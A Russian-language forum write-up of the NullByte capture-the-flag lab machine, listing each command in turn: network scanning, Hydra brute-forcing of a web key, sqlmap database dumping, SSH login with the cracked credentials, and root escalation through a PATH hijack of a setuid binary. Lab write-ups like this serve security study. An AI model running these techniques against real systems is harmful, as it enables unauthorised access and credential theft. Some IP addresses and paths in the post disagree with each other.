Взлом NullByte VM (CTF)

Тема в разделе "Этичный хакинг и тестирование на проникновение", создана пользователем Vander, 28 ноя 2016.

Наш партнер Genesis Hackspace
  1. Vander

    Vander Супер-модератор
    Команда форума Grey Team

    Регистрация:
    16 янв 2016
    Сообщения:
    671
    Симпатии:
    1.140
    Всем привет! В этой статье я опишу взлом уязвимой машины в рамках соревнований CTF.

    Называется она NullByte VM (CTF Challenge) Для начала скачаем образ виртуальной машины отсюда => https://www.vulnhub.com/entry/nullbyte-1,126/. Затем импортируем его, например, в VMware.

    Взлом NullByte VM (CTF)

    В качестве атакуемой машины, мной будет использоваться Kali Linux 2016.1 Rolling.

    Начнем как обычно со сканирования своей сети, дабы обнаружить NullByte.

    > arp-scan 192.168.0.1/16

    Взлом NullByte VM (CTF)

    В моем случае целевой хост имеет адрес 192.168.0.109.

    Так же по традиции, запустим nmap в режиме агрессивного сканирования.

    > nmap –A 192.168.0.109


    Взлом NullByte VM (CTF)

    Видим информацию о трех открытых портах, если с 777 и 80 все предельно ясно, а вот назначение 111 мне пока не ясно, возможно вернемся к нему позже.

    Пока попробуем посмотреть, что же находится на 80 порту, зайдем на сервер по адресу 192.169.0.109:80.

    Взлом NullByte VM (CTF)

    Замечательная картинка и все… Пока ничего не ясно. Есть вариант посмотреть метаданные, так как они точно есть, это видно в исходном коде элемента. Перепробовав несколько онлайн сервисов, результата я не получил, виной тому формат .gif. Изрядно погуглив, я вышел на утилитку exiftool, которую можно установить в Kali Linux.

    > apt-get install exiftool

    Взлом NullByte VM (CTF)

    Теперь можем просмотреть метаданные.

    > exiftool main.gif


    Взлом NullByte VM (CTF)

    Строка Comment содержит явную подказку, сразу скажу – это директория, до этого я много пытался с ней сделать. Зайдем на сервер по адресу:

    > 192.168.0.109/kzMb5nVYjw

    Взлом NullByte VM (CTF)

    Ключа у нас нет, но есть Hydra, ей и воспользуемся. Будем брутить эту форму входа. Для этого в терминале вводим следующую команду:

    > hydra 192.168.56.109 http-form-post "/kzMb5nVYJw/index.php:key=^PASS^:invalid key" -l x -P /usr/share/dict/words -t 10 -w 30

    Взлом NullByte VM (CTF)

    Дожидаемся окончания работы Гидры и получаем искомый пароль – elite. Используем его для входа на страницу.

    Взлом NullByte VM (CTF)

    Теперь у нас спрашивают имя пользователя, так как никакой информацией мы не располагаем, попробуем подключить к работе sqlmap.

    > sqlmap –u http://192.168.0.109/kzMb5nVYJw/420search.php?usrtosearch=1 –dbs

    Взлом NullByte VM (CTF)

    Выполнение этого действия дало нам информацию о 5 найденных базах.

    Взлом NullByte VM (CTF)

    Нас же интересует – seth. Попробуем выжать больше информации следующей командой:

    > sqlmap –u http://192.168.0.109/kzMb5nVYJw/420search.php?usrtosearch=1 –dump –columns –tables –D seth

    Взлом NullByte VM (CTF)

    Теперь у нас есть имя пользователя и хэш пароля.

    Взлом NullByte VM (CTF)

    Хэш отнесем на любой понравившийся вам онлайн расшифровщик. Но перед этим приведем его в вид base64.

    > echo "YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE=" | base64 –d

    Взлом NullByte VM (CTF)

    Теперь у нас на руках есть учетные данные одного пользователя.

    Взлом NullByte VM (CTF)

    Пароль – omega, логин – ramses. Попробуем эту связку при попытке доступа по SSH.

    > ssh ramses@192.168.0.109 –p 777

    В результате получаем открытую сессию SSH.

    Взлом NullByte VM (CTF)

    По итогам осмотра содержимого, интересным показался файл procwatch, находящийся в каталоге /var/www/backup. Запустив его, мы видим, что он вызывает список процессов.

    Взлом NullByte VM (CTF)

    Если нам удастся изменить путь файла для ps на sh, то мы сможем добраться до корневого каталога. Для выполнения этой задачи вводим следующие команды:

    > cd /tmp

    > cp /bin/sh /tmp/ps

    > export PATH=/tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

    > cd /var/www/backup

    > ./procwatch

    > whoami

    Взлом NullByte VM (CTF)

    Цель достигнута, мы root, далее выполняем:

    > cd /root

    > ls –a

    > cat proof.txt

    Взлом NullByte VM (CTF)

    На этом прохождение Null Byte можно считать законченным. Спасибо за внимание.
     
    Георгий, uz3r0x7e0, ~~DarkNode~~ и 4 другим нравится это.
Загрузка...

Поделиться этой страницей